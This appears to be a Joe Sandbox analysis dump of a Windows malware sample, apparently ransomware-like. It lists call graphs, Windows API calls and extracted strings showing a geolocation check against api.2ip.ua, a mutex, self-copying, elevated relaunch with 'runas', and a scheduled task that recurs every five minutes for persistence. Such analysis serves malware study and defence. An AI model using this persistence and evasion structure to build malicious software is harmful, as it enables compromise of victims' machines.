___check_float_string 45139->45485 45140 4184b9 45140->44811 45143->45140 45486 418d50 59 API calls 45143->45486 45487 431781 45144->45487 45505 42f7c0 45147->45505 45150 411d20 _memset 45151 411d40 RegQueryValueExW RegCloseKey 45150->45151 45152 411d8f 45151->45152 45152->45152 45153 415c10 59 API calls 45152->45153 45154 411dbf 45153->45154 45155 411dd1 lstrlenA 45154->45155 45156 411e7c 45154->45156 45507 413520 59 API calls 45155->45507 45157 411e94 6 API calls 45156->45157 45160 411ef5 UuidCreate UuidToStringW 45157->45160 45159 411df1 45161 411e3c PathFileExistsW 45159->45161 45162 411e00 45159->45162 45163 411f36 45160->45163 45161->45156 45164 411e52 45161->45164 45162->45159 45162->45161 45163->45163 45166 415c10 59 API calls 45163->45166 45165 411e6a 45164->45165 45168 414690 59 API calls 45164->45168 45174 4121d1 45165->45174 45167 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45166->45167 45169 411f98 45167->45169 45171 411fce 45167->45171 45168->45165 45170 415c10 59 API calls 45169->45170 45170->45171 45172 415c10 59 API calls 45171->45172 45173 41201f PathAppendW GetLongPathNameW CopyFileW RegOpenKeyExW 45172->45173 45173->45174 45175 41207c _memset 45173->45175 45174->44840 45176 412095 6 API calls 45175->45176 45177 412115 _memset 45176->45177 45178 412109 45176->45178 45180 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45177->45180 45508 413260 59 API calls 45178->45508 45181 4121b2 45180->45181 45182 4121aa GetLastError 45180->45182 45183 4121c0 WaitForSingleObject 45181->45183 45182->45174 45183->45174 45183->45183 45185 42f7c0 __ftell_nolock 45184->45185 45186 41222d 7 API calls 45185->45186 45187 4122bd K32EnumProcesses 45186->45187 45188 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45186->45188 45189 4122d3 45187->45189 45191 4122df 45187->45191 45188->45187 45189->44814 45190 412353 45190->44814 45191->45190 45192 4122f0 OpenProcess 45191->45192 45193 412346 CloseHandle 45192->45193 45194 41230a K32EnumProcessModules 45192->45194 45193->45190 45193->45192 45194->45193 45195 41231c K32GetModuleBaseNameW 45194->45195 45509 420235 45195->45509 45197 41233e 45197->45193 45198 412345 45197->45198 45198->45193 45200 420c62 _malloc 58 API calls 45199->45200 45203 40ef6e _memset 45200->45203 45201 40efdc 45201->44819 45202 420c62 _malloc 58 API calls 45202->45203 45203->45201 45203->45202 45203->45203 45205 413f05 45204->45205 45209 413eae 45204->45209 45206 413fb1 45205->45206 45207 413f18 45205->45207 45525 44f23e 59 API calls 2 library calls 45206->45525 45210 413fbb 45207->45210 45211 413f2d 45207->45211 45212 413f3d ___check_float_string 45207->45212 45209->45205 45216 413ed4 45209->45216 45526 44f23e 59 API calls 2 library calls 45210->45526 45211->45212 45524 416760 59 API calls 2 library calls 45211->45524 45212->44819 45218 413ed9 45216->45218 45219 413eef 45216->45219 45522 413da0 59 API calls ___check_float_string 45218->45522 45523 413da0 59 API calls ___check_float_string 45219->45523 45223 413ee9 45223->44819 45224 413eff 45224->44819 45226 4146a9 45225->45226 45227 41478c 45225->45227 45228 4146b6 45226->45228 45229 4146e9 45226->45229 45529 44f26c 59 API calls 3 library calls 45227->45529 45231 4146c2 45228->45231 45232 414796 45228->45232 45233 4147a0 45229->45233 45234 4146f5 45229->45234 45527 413340 59 API calls _memmove 45231->45527 45530 44f26c 59 API calls 3 library calls 45232->45530 45531 44f23e 59 API calls 2 library calls 45233->45531 45246 414707 ___check_float_string 45234->45246 45528 416950 59 API calls 2 library calls 45234->45528 45242 4146e0 45242->44834 45246->44834 45249 40d27d CoInitializeSecurity 45248->45249 45255 40d276 45248->45255 45250 414690 59 API calls 45249->45250 45251 40d2b8 CoCreateInstance 45250->45251 45252 40d2e3 VariantInit VariantInit VariantInit VariantInit 45251->45252 45253 40da3c CoUninitialize 45251->45253 45254 40d38e VariantClear VariantClear VariantClear VariantClear 45252->45254 45253->45255 45256 40d3e2 45254->45256 45257 40d3cc CoUninitialize 45254->45257 45255->44860 45532 40b140 45256->45532 45257->45255 45260 40d3f6 45537 40b1d0 45260->45537 45262 40d422 45263 40d426 CoUninitialize 45262->45263 45264 40d43c 45262->45264 45263->45255 45265 40b140 60 API calls 45264->45265 45267 40d449 45265->45267 45268 40b1d0 SysFreeString 45267->45268 45269 40d471 45268->45269 45270 40d496 CoUninitialize 45269->45270 45271 40d4ac 45269->45271 45270->45255 45273 40b140 60 API calls 45271->45273 45328 40d8cf 45271->45328 45274 40d4d5 45273->45274 45275 40b1d0 SysFreeString 45274->45275 45276 40d4fd 45275->45276 45277 40b140 60 API calls 45276->45277 45276->45328 45278 40d5ae 45277->45278 45279 40b1d0 SysFreeString 45278->45279 45280 40d5d6 45279->45280 45281 40b140 60 API calls 45280->45281 45280->45328 45282 40d679 45281->45282 45283 40b1d0 SysFreeString 45282->45283 45284 40d6a1 45283->45284 45285 40b140 60 API calls 45284->45285 45284->45328 45286 40d6b6 45285->45286 45287 40b1d0 SysFreeString 45286->45287 45288 40d6de 45287->45288 45289 40b140 60 API calls 45288->45289 45288->45328 45290 40d707 45289->45290 45291 40b1d0 SysFreeString 45290->45291 45292 40d72f 45291->45292 45293 40b140 60 API calls 45292->45293 45292->45328 45294 40d744 45293->45294 45295 40b1d0 SysFreeString 45294->45295 45296 40d76c 45295->45296 45296->45328 45541 423aaf GetSystemTimeAsFileTime 45296->45541 45298 40d77d 45543 423551 45298->45543 45303 412c40 59 API calls 45304 40d7b5 45303->45304 45305 412900 60 API calls 45304->45305 45306 40d7c3 45305->45306 45307 40b140 60 API calls 45306->45307 45308 40d7db 45307->45308 45309 40b1d0 SysFreeString 45308->45309 45310 40d7ff 45309->45310 45311 40b140 60 API calls 45310->45311 45310->45328 45312 40d8a3 45311->45312 45313 40b1d0 SysFreeString 45312->45313 45314 40d8cb 45313->45314 45315 40b140 60 API calls 45314->45315 45314->45328 45316 40d8ea 45315->45316 45317 40b1d0 SysFreeString 45316->45317 45318 40d912 45317->45318 45318->45328 45551 40b400 SysAllocString 45318->45551 45320 40d936 VariantInit VariantInit 45321 40b140 60 API calls 45320->45321 45322 40d985 45321->45322 45323 40b1d0 SysFreeString 45322->45323 45324 40d9e7 VariantClear VariantClear VariantClear 45323->45324 45325 40da10 45324->45325 45326 40da46 CoUninitialize 45324->45326 45555 42052a 78 API calls swprintf 45325->45555 45326->45255 45328->45253 45330->44793 45331->44837 45332->44838 45333->44874 45335 420cdd 45334->45335 45343 420c6e 45334->45343 45723 42793d DecodePointer 45335->45723 45337 420ce3 45724 425208 58 API calls __getptd_noexit 45337->45724 45340 420ca1 RtlAllocateHeap 45340->45343 45350 420cd5 45340->45350 45342 420cc9 45721 425208 58 API calls __getptd_noexit 45342->45721 45343->45340 45343->45342 45347 420cc7 45343->45347 45348 420c79 45343->45348 45720 42793d DecodePointer 45343->45720 45722 425208 58 API calls __getptd_noexit 45347->45722 45348->45343 45715 427f51 58 API calls 2 library calls 45348->45715 45716 427fae 58 API calls 9 library calls 45348->45716 45717 427b0b 45348->45717 45350->44864 45351->44877 45353 415c66 45352->45353 45358 415c1e 45352->45358 45354 415c76 45353->45354 45355 415cff 45353->45355 45362 415c88 ___check_float_string 45354->45362 45729 416950 59 API calls 2 library calls 45354->45729 45730 44f23e 59 API calls 2 library calls 45355->45730 45358->45353 45363 415c45 45358->45363 45362->44881 45365 414690 59 API calls 45363->45365 45366 415c60 45365->45366 45366->44881 45367->44883 45368->44886 45369->44892 45370->44902 45372 413a90 59 API calls 45371->45372 45373 41294c MultiByteToWideChar 45372->45373 45374 418400 59 API calls 45373->45374 45375 41298d 45374->45375 45375->44905 45376->44910 45377->44918 45378->44924 45379->44928 45380->44932 45381->44936 45382->44940 45383->44944 45384->44948 45385->44950 45386->44952 45387->44954 45388->44956 45389->44958 45390->44960 45391->44962 45392->44964 45393->44966 45394->44968 45395->44970 45396->44972 45397->44974 45398->44976 45399->44978 45400->44980 45402 412c71 45401->45402 45403 412c5f 45401->45403 45406 4156d0 59 API calls 45402->45406 45404 4156d0 59 API calls 45403->45404 45405 412c6a 45404->45405 45405->44985 45407 412c8a 45406->45407 45407->44985 45408->44987 45409->45010 45410->45010 45411->45010 45412->44991 45413->44993 45414->44996 45415->44999 45416->45002 45417->45004 45418->45007 45419->45012 45420->45014 45421->45038 45422->45038 45423->45038 45424->45038 45425->45038 45426->45038 45731 41f130 218 API calls _LanguageEnumProc@4 45426->45731 45427->45018 45732 41fd80 64 API calls 45427->45732 45431 415735 45430->45431 45436 4156de 45430->45436 45432 4157bc 45431->45432 45433 41573e 45431->45433 45454 44f23e 59 API calls 2 library calls 45432->45454 45442 415750 ___check_float_string 45433->45442 45453 416760 59 API calls 2 library calls 45433->45453 45436->45431 45440 415704 45436->45440 45443 415709 45440->45443 45444 41571f 45440->45444 45442->45114 45451 413ff0 59 API calls ___check_float_string 45443->45451 45452 413ff0 59 API calls ___check_float_string 45444->45452 45447 41572f 45447->45114 45448 415719 45448->45114 45449->45118 45450->45117 45451->45448 45452->45447 45453->45442 45461 423b4c 45455->45461 45457 41ccca 45460 41a00a 45457->45460 45471 44f1bb 59 API calls 3 library calls 45457->45471 45460->44795 45460->44796 45465 423b54 45461->45465 45462 420c62 _malloc 58 API calls 45462->45465 45463 423b6e 45463->45457 45465->45462 45465->45463 45466 423b72 std::exception::exception 45465->45466 45472 42793d DecodePointer 45465->45472 45473 430eca RaiseException 45466->45473 45468 423b9c 45474 430d91 58 API calls _free 45468->45474 45470 423bae 45470->45457 45472->45465 45473->45468 45474->45470 45476 423b4c 59 API calls 45475->45476 45477 41cc5d 45476->45477 45479 41cc64 45477->45479 45482 44f1bb 59 API calls 3 library calls 45477->45482 45479->45126 45481 41d740 59 API calls 45479->45481 45481->45126 45485->45143 45486->45143 45490 431570 45487->45490 45491 431580 45490->45491 45492 431586 45491->45492 45497 4315ae 45491->45497 45501 425208 58 API calls __getptd_noexit 45492->45501 45494 43158b 45502 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45494->45502 45498 4315cf wcstoxl 45497->45498 45503 42e883 GetStringTypeW 45497->45503 45500 41a36e lstrcpyW lstrcpyW 45498->45500 45504 425208 58 API calls __getptd_noexit 45498->45504 45500->44829 45501->45494 45502->45500 45503->45497 45504->45500 45506 411cf2 RegOpenKeyExW 45505->45506 45506->45150 45506->45174 45507->45159 45508->45177 45510 420241 45509->45510 45511 4202b6 45509->45511 45514 420266 45510->45514 45519 425208 58 API calls __getptd_noexit 45510->45519 45521 4202c8 60 API calls 3 library calls 45511->45521 45513 4202c3 45513->45197 45514->45197 45516 42024d 45520 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45516->45520 45518 420258 45518->45197 45519->45516 45520->45518 45521->45513 45522->45223 45523->45224 45524->45212 45527->45242 45528->45246 45529->45232 45530->45233 45533 423b4c 59 API calls 45532->45533 45534 40b164 45533->45534 45535 40b177 SysAllocString 45534->45535 45536 40b194 45534->45536 45535->45536 45536->45260 45538 40b1de 45537->45538 45540 40b202 45537->45540 45539 40b1f5 SysFreeString 45538->45539 45538->45540 45539->45540 45540->45262 45542 423add __aulldiv 45541->45542 45542->45298 45556 43035d 45543->45556 45545 42355a 45547 40d78f 45545->45547 45564 423576 45545->45564 45548 4228e0 45547->45548 45668 42279f 45548->45668 45552 40b423 45551->45552 45553 40b41d 45551->45553 45554 40b42d VariantClear 45552->45554 45553->45320 45554->45320 45555->45328 45597 42501f 58 API calls 4 library calls 45556->45597 45558 430369 45561 43038d 45558->45561 45598 425208 58 API calls __getptd_noexit 45558->45598 45559 430363 45559->45558 45559->45561 45599 428cde 58 API calls 2 library calls 45559->45599 45561->45545 45562 43036e 45562->45545 45565 423591 45564->45565 45566 4235a9 _memset 45564->45566 45608 425208 58 API calls __getptd_noexit 45565->45608 45566->45565 45573 4235c0 45566->45573 45568 423596 45609 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45568->45609 45570 4235cb 45610 425208 58 API calls __getptd_noexit 45570->45610 45571 4235e9 45600 42fb64 45571->45600 45573->45570 45573->45571 45575 4235ee 45611 42f803 58 API calls _fputws 45575->45611 45577 4235f7 45578 4237e5 45577->45578 45612 42f82d 58 API calls _fputws 45577->45612 45625 4242fd 8 API calls 2 library calls 45578->45625 45581 423609 45581->45578 45613 42f857 45581->45613 45582 4237ef 45584 42361b 45584->45578 45585 423624 45584->45585 45586 42369b 45585->45586 45588 423637 45585->45588 45623 42f939 58 API calls 4 library calls 45586->45623 45620 42f939 58 API calls 4 library calls 45588->45620 45589 4236a2 45596 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45589->45596 45624 42fbb4 58 API calls 4 library calls 45589->45624 45591 42364f 45591->45596 45621 42fbb4 58 API calls 4 library calls 45591->45621 45594 423668 45594->45596 45622 42f939 58 API calls 4 library calls 45594->45622 45596->45547 45597->45559 45598->45562 45599->45558 45601 42fb70 _fputws 45600->45601 45602 42fba5 _fputws 45601->45602 45603 428af7 __lock 58 API calls 45601->45603 45602->45575 45604 42fb80 45603->45604 45605 42fb93 45604->45605 45626 42fe47 45604->45626 45655 42fbab LeaveCriticalSection _doexit 45605->45655 45608->45568 45609->45596 45610->45596 45611->45577 45612->45581 45614 42f861 45613->45614 45615 42f876 45613->45615 45666 425208 58 API calls __getptd_noexit 45614->45666 45615->45584 45617 42f866 45667 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45617->45667 45619 42f871 45619->45584 45620->45591 45621->45594 45622->45596 45623->45589 45624->45596 45625->45582 45627 42fe53 _fputws 45626->45627 45628 428af7 __lock 58 API calls 45627->45628 45629 42fe71 _W_expandtime 45628->45629 45630 42f857 __tzset_nolock 58 API calls 45629->45630 45631 42fe86 45630->45631 45642 42ff25 __tzset_nolock __isindst_nolock 45631->45642 45656 42f803 58 API calls _fputws 45631->45656 45634 42fe98 45634->45642 45657 42f82d 58 API calls _fputws 45634->45657 45635 42ff71 GetTimeZoneInformation 45635->45642 45638 42feaa 45638->45642 45658 433f99 58 API calls 2 library calls 45638->45658 45639 42ffd8 WideCharToMultiByte 45639->45642 45641 42feb8 45659 441667 78 API calls 3 library calls 45641->45659 45642->45635 45642->45639 45643 430010 WideCharToMultiByte 45642->45643 45648 43ff8e 58 API calls __tzset_nolock 45642->45648 45653 423c2d 61 API calls __tzset_nolock 45642->45653 45654 430157 __tzset_nolock _fputws __isindst_nolock 45642->45654 45663 4242fd 8 API calls 2 library calls 45642->45663 45664 420bed 58 API calls 2 library calls 45642->45664 45665 4300d7 LeaveCriticalSection _doexit 45642->45665 45643->45642 45646 42ff0c _strlen 45661 428cde 58 API calls 2 library calls 45646->45661 45647 42fed9 type_info::before 45647->45642 45647->45646 45660 420bed 58 API calls 2 library calls 45647->45660 45648->45642 45651 42ff1a _strlen 45651->45642 45662 42c0fd 58 API calls _fputws 45651->45662 45653->45642 45654->45605 45655->45602 45656->45634 45657->45638 45658->45641 45659->45647 45660->45646 45661->45651 45662->45642 45663->45642 45664->45642 45665->45642 45666->45617 45667->45619 45695 42019c 45668->45695 45671 4227d4 45703 425208 58 API calls __getptd_noexit 45671->45703 45673 4227d9 45704 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45673->45704 45674 4227e9 MultiByteToWideChar 45676 422804 GetLastError 45674->45676 45677 422815 45674->45677 45705 4251e7 58 API calls 3 library calls 45676->45705 45706 428cde 58 API calls 2 library calls 45677->45706 45678 40d7a3 45678->45303 45681 422810 45710 420bed 58 API calls 2 library calls 45681->45710 45682 42281d 45682->45681 45683 422825 MultiByteToWideChar 45682->45683 45683->45676 45685 42283f 45683->45685 45707 428cde 58 API calls 2 library calls 45685->45707 45686 4228a0 45711 420bed 58 API calls 2 library calls 45686->45711 45689 42284a 45689->45681 45708 42d51e 88 API calls 3 library calls 45689->45708 45691 422866 45691->45681 45692 42286f WideCharToMultiByte 45691->45692 45692->45681 45693 42288b GetLastError 45692->45693 45709 4251e7 58 API calls 3 library calls 45693->45709 45696 4201ad 45695->45696 45702 4201fa 45695->45702 45712 425007 58 API calls 2 library calls 45696->45712 45698 4201b3 45699 4201da 45698->45699 45713 4245dc 58 API calls 6 library calls 45698->45713 45699->45702 45714 42495e 58 API calls 6 library calls 45699->45714 45702->45671 45702->45674 45703->45673 45704->45678 45705->45681 45706->45682 45707->45689 45708->45691 45709->45681 45710->45686 45711->45678 45712->45698 45713->45699 45714->45702 45715->45348 45716->45348 45725 427ad7 GetModuleHandleExW 45717->45725 45720->45343 45721->45347 45722->45350 45723->45337 45724->45350 45726 427af0 GetProcAddress 45725->45726 45727 427b07 ExitProcess 45725->45727 45726->45727 45728 427b02 45726->45728 45728->45727 45729->45362 45736 427e1a _fputws 45735->45736 45737 428af7 __lock 51 API calls 45736->45737 45738 427e21 45737->45738 45739 427eda _doexit 45738->45739 45740 427e4f DecodePointer 45738->45740 45755 427f28 45739->45755 45740->45739 45742 427e66 DecodePointer 45740->45742 45748 427e76 45742->45748 45744 427f37 _fputws 45744->45041 45746 427e83 EncodePointer 45746->45748 45747 427f1f 45749 427b0b __lockerr_exit 3 API calls 45747->45749 45748->45739 45748->45746 45750 427e93 DecodePointer EncodePointer 45748->45750 45751 427f28 45749->45751 45753 427ea5 DecodePointer DecodePointer 45750->45753 45752 427f35 45751->45752 45760 428c81 LeaveCriticalSection 45751->45760 45752->45041 45753->45748 45756 427f08 45755->45756 45757 427f2e 45755->45757 45756->45744 45759 428c81 LeaveCriticalSection 45756->45759 45761 428c81 LeaveCriticalSection 45757->45761 45759->45747 45760->45752 45761->45756
                APIs
                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                • GetLastError.KERNEL32 ref: 00419FD2
                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                • GetLastError.KERNEL32 ref: 00419FE4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0076A9A0,?), ref: 0041A0BB
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                • API String ID: 2957410896-3144399390
                • Opcode ID: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                • Opcode Fuzzy Hash: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040D26C
                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                • VariantInit.OLEAUT32(?), ref: 0040D309
                • VariantInit.OLEAUT32(?), ref: 0040D322
                • VariantInit.OLEAUT32(?), ref: 0040D33B
                • VariantClear.OLEAUT32(?), ref: 0040D397
                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                • CoUninitialize.OLE32 ref: 0040D3D5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                • API String ID: 2496729271-1738591096
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                APIs
                • _memset.LIBCMT ref: 0040CF4A
                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                Strings
                • Microsoft Internet Explorer, xrefs: 0040CF5A
                • "country_code":", xrefs: 0040CFE1
                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead_memset
                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                • API String ID: 1485416377-2962370585
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                Control-flow Graph

                • Executed
                • Not Executed
